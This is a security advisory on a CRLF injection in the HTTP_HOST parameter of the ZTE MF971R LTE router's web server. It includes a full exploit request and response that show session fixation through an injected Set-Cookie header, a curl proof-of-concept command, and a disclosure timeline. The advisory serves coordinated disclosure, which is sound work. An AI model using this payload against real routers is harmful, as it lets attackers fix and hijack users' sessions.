ZTE MF971R HTTP_HOST CRLF Injection vulnerability

Summary

An exploitable CRLF injection vulnerability exists in ZTE MF971R LTE router version wa_inner_version:BD_PLKPLMF971R1V1.0.0B06. A specially-crafted HTTP request can cause a CRLF injection. An attacker needs to provide a URL to the victim to trigger the vulnerability.

Tested Versions

ZTE Corporation MF971R wa_inner_version:BD_LVWRGBMF971RV1.0.0B01
ZTE Corporation MF971R wa_inner_version:BD_PLKPLMF971R1V1.0.0B06
ZTE Corporation MF971R zte_topsw_goahead - MD5 B2176B393A97B5BA13791FC591D2BE3F
ZTE Corporation MF971R zte_topsw_goahead - MD5 bf5ada32c9e8c815bfd51bfb5b8391cb

Product URLs

<https://www.ztedevices.com/pl/product/zte-mf971r/&gt;

CVSSv3 Score

6.3 - CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L

CWE

CWE-113 - Improper Neutralization of CRLF Sequences in HTTP Headers (‘HTTP Response Splitting’)

Details

MF971R its a portable router with Wi-Fi support and LTE/GSM modem.

This vulnerability is present in the HTTP_HOST parameter which is a part of the ZTE MF971R zte_topsw_goahead HTTP daemon/web applications. A specially-crafted URL sent by an attacker and visited by a victim can lead to CRLF Injection.

A HTTP_HOST parameter passed via GET method to zte_topsw_goahead daemon is not properly sanitized of any special characters. The value delivered with this parameter is later used in a response Location header. Because it is not sanitized, an attacker can inject \r\n signs and exploit in a few different ways.

Below is an example of an attacker setting a session cookie to their own value (i.e. session fixation):

Request:

GET /?HTTP_HOST=%0d%0aSet-Cookie%3a%20stok=45BD8566DAEB75D2796134AA%0d%0aX-Magic:%20 HTTP/1.1
Host: 192.168.2.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://evil.localdomain/127.0.0.1.html
Connection: close

Response:

HTTP/1.1 302 Redirect
Server: WebServer-Webs
Date: Wed Apr 28 04:33:05 2021
Pragma: no-cache
Cache-Control: no-store
Content-Type: text/html
X-Frame-Options: sameorigin
X-XSS-Protection: 1; mode=block
Location: http://192.168.2.1 
Set-Cookie: stok=45BD8566DAEB75D2796134AA
X-Magic: /index.html

<html><head></head><body>
		This document has moved to a new <a href="http://192.168.2.1      Set-Cookie: stok=45BD8566DAEB75D2796134AA     X-Magic: /index.html">location</a>.
		Please update your documents to reflect the new location.
		&lt;/body&gt;&lt;/html&gt;

The victim does not need to be logged-in to be affected by this vulnerability.

Exploit Proof of Concept

curl -i -s -k -X $'GET' \
	-H $'Host: 192.168.2.1' \
	$'http://192.168.2.1/?HTTP_HOST=%0d%0aSet-Cookie%3a%20stok=45BD8566DAEB75D2796134AA%0d%0aX-Magic:%20'

Timeline

2021-06-15 - Vendor disclosure
2021-09-14 - Disclosure extension granted
2021-10-15 - Vendor patched
2021-10-18 - Public release